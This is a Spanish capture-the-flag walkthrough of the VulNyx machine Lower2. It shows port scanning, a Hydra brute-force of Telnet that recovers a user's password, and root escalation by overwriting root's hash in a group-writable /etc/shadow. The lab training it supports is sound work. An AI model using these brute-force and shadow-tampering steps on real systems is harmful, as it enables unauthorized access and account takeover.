🔵 NYX - Lower2
#vulnyx #nyx #linux #telnet (bruteforce) #shadow (group) #/etc/shadow (writable)
Febrero 16, 2025 by Miguel R. (d4t4s3c)
Information
Lower2 es una máquina Linux de la plataforma VulNyx, tiene un nivel de dificultad bajo y fue creada por el usuario d4t4s3c.
- Acceso inicial: Enumero a un usuario mediante el banner de SSH y posteriormente realizo fuerza bruta al servicio Telnet, se obtiene el password y se accede al sistema con las credenciales obtenidas.
- Escalada de privilegios: El usuario dispone de permisos para escribir el archivo shadow permitiendo convertise en root.
Enumeration
Nmap
TCP
❯ nmap -n -Pn -sS -p- --min-rate 5000 192.168.1.56
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-16 20:26 CET
Nmap scan report for 192.168.1.56
Host is up (0.000097s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
23/tcp open telnet
80/tcp open http
❯ nmap -sVC -p22,23,80 192.168.1.56
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-16 20:26 CET
Nmap scan report for 192.168.1.56
Host is up (0.00056s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u4 (protocol 2.0)
| ssh-hostkey:
| 256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA)
|_ 256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519)
23/tcp open telnet Netkit telnet-ssl telnetd
80/tcp open http nginx 1.22.1
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.22.1
Shell (b.taylor)
80/TCP (HTTP)
Directory Brute Force
❯ gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.1.56
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.56
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 220546 / 220547 (100.00%)
===============================================================
Finished
===============================================================
22/TCP (SSH)
Enumero al usuario b.taylor en el banner del servicio SSH
❯ ssh root@192.168.1.56
###################################################
### Welcome to Brian Taylor's (b.taylor) server ###
###################################################
root@192.168.1.56: Permission denied (publickey).
23/TCP (TELNET)
Password Brute Force
Al disponer de un usuario, trato de obtener su password con Hydra
❯ hydra -l b.taylor -P /opt/techyou.txt telnet://192.168.1.56 -F -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-16 20:35:41
[WARNING] telnet is by its nature unreliable to analyze, if possible better choose FTP, SSH, etc. if available
[DATA] max 16 tasks per 1 server, overall 16 tasks, 10000 login tries (l:1/p:10000), ~625 tries per task
[DATA] attacking telnet://192.168.1.56:23/
[23][telnet] host: 192.168.1.56 login: b.taylor password: rockyou
[STATUS] attack finished for 192.168.1.56 (valid pair found)
Obtengo el password rockyou del usuario b.taylor y accedo al sistema con las credenciales obtenidas
❯ telnet 192.168.1.56
Trying 192.168.1.56...
Connected to 192.168.1.56.
Escape character is '^]'.
lower2 login: b.taylor
Password:
Last login: Sun Feb 16 20:35:42 CET 2025 from 192.168.1.10 on pts/10
b.taylor@lower2:~$ id ; hostname
uid=1000(b.taylor) gid=1000(b.taylor) grupos=1000(b.taylor),42(shadow)
lower2
Privilege Escalation
El usuario b.taylor forma parte del grupo shadow
b.taylor@lower2:~$ id
uid=1000(b.taylor) gid=1000(b.taylor) grupos=1000(b.taylor),42(shadow)
b.taylor@lower2:~$ groups
b.taylor shadow
Los miembros del grupo shadow tienen permisos de lectura sobre el archivo /etc/shadow y en este caso además de escritura.
b.taylor@lower2:~$ ls -l /etc/shadow
-rw-rw---- 1 root shadow 749 feb 16 07:10 /etc/shadow
Creo un hash de tipo yescrypt con el password 123456
❯ mkpasswd --method=yescrypt 123456
$y$j9T$kGeVfWcKlLsKSsfRC7dze/$Dl.ymNlm3J4rP4gv5aPlGjN7LyUaLw9Nb9SsLORnxr9
Agrego el nuevo hash en la linea del usuario root en el archivo /etc/shadow
b.taylor@lower2:~$ head -n1 /etc/shadow
root:$y$j9T$RDW/7EgA4sElvqxLVk.Uo.$OmF5Lm4Ub/UeC2ua6tTQnHB07WKpYs1lOXl.lS581q8:20134:0:99999:7:::
b.taylor@lower2:~$ nano /etc/shadow
b.taylor@lower2:~$ head -n1 /etc/shadow
root:$y$j9T$kGeVfWcKlLsKSsfRC7dze/$Dl.ymNlm3J4rP4gv5aPlGjN7LyUaLw9Nb9SsLORnxr9:20134:0:99999:7:::
b.taylor@lower2:~$ su - root
Contraseña:
root@lower2:~# id ; hostname
uid=0(root) gid=0(root) grupos=0(root)
lower2
Me convierto en usuario root
b.taylor@lower2:~$ su - root
Contraseña:
root@lower2:~# id ; hostname
uid=0(root) gid=0(root) grupos=0(root)
lower2
Flags
Ya como usuario root puedo leer las flags user.txt y root.txt
root@lower2:~# find / -name user.txt -o -name root.txt 2>/dev/null |xargs cat
235aa***************************
edc9f***************************
Hasta aquí la resolución de la máquina Lower2.
Happy Hacking!
© d4t4s3c 2023-2025